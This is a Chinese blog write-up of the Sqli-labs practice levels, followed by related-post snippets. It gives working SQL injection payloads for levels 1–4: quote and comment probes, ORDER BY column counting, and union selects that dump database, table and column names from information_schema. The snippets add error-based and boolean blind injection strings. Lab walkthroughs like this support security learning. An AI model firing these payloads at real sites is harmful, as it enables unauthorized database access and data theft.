Sqli Labs闖關 更新中

2021-09-27 07:57:39 字數 3402 閱讀 2879

正常訪問:

一、判斷

1

and1=2

//訪問正常,不是數值查詢

1' //報錯,可能為sql字元注入
1' --

+//返回正常,所以為單引號字元注入

注:

1、我使用的是 --+來注釋sql後面的語句,+的作用是,它在解析的時候會被解析為空格,用來隔開 --與後面語句。

2、#注釋也是可行的,但在瀏覽器的url中,他是被用來指導瀏覽器動作的,所以http請求並不包含它,只要將它轉換為url編碼%23.

3、 --』也可以

二、查詢

1、查詢列數

找乙個臨界值,這道題3正常,4錯誤,所以3就是那個臨界值,說明這個表就是3列。

1'order by 3

--+

2、聯合查詢

找乙個不存在的頁面,檢視是否有顯示位,如圖有2、3兩個顯示位。(因為mysql_fetch_array();這個函式,只會取出一行,如果要把所有結果取出來要用迴圈來取了在這兒我們只需要讓union select前面的查詢結果為空集,則後面的自然就成了第一行了,怎樣讓前面的成空集呢,只需要將id改為表裡沒有的,或者不合法的額就行)

2.1、查詢庫名

group_concat:顯示所有內容並且相同內容只顯示一次。

2.2、查詢表名

2.3查詢字段

999' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='emails') --+
注: union官方解釋是用來把多個select語句的結果組合到乙個結果集合中,且每列的資料型別必須相同。

group_concat也可以用limt替換。例如:999』 union select 1,2,(select table_name from information_schema.tables where table_schema = (select database()) limit 0,1) --+

和第一題幾乎一樣,只是沒有了』的閉合

1 order by 3

999 union select 1,2

,3999 union select 1

,(select group_concat

(schema_name

) from information_schema

.schemata),

3999 union select 1

,(select group_concat

(table_name

) from information_schema

.tables),

3999 union select 1

,(select group_concat

(column_name

) from information_schema

.columns where table_schema

=(select database()

)),3

加』嘗試,發現報錯,檢視報錯語句』1』),所以猜測後台的查詢語句為(』$id』)。

構造payload

1

') order by 3 --+

999'

) union select 1,2

,3--+

999') union select 1

,(select group_concat

(column_name

) from information_schema

.columns where table_schema

=(select database()

)),3

--+

在引數加雙引號報錯,根據報錯資訊構造(") --+)

構造payload

") order by 3 --+

") union select 1,2

,3--+

") union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

") union select 1

,(select group_concat

(table_name

) from information_schema

.tables),

3--+") union select 1

,(select group_concat

(column_name

) from information_schema

.columns where table_schema

=(select database()

)),3

--+

sqli labs闖關之61 65關

最後五關!第六十一關 和六十關基本一樣,就是變成了單括號和雙括號,這好像是第一次遇見雙括號 爆資料庫名 id 1 and extractvalue 1,concat 0x5c,select database 23 爆表名 id 0 union select extractvalue 1,concat...

sqli labs闖關筆記 less8 10 盲注

一 布林型盲注,布林盲注與less6思路一致。1 查詢注入點 輸入單引號,you are in消失,證明存在注入點。找到閉合引數的方法,單引號後面直接加注釋,you are in出現,證明閉合方式正確。2 猜資料庫名 and left select database 1 s 3 猜表名 and as...

flex 筆記(更新中。。。。)

1 如果要設定validator驗證元件裡面提示字的大小,可以在mxml中加入 3 如果你想要在tooltip中換行顯示文字,則 在actionscript 中,您使用 n 轉義的新行字元。在 mxml 標籤中,您使用 如 tooltip child components without toolt...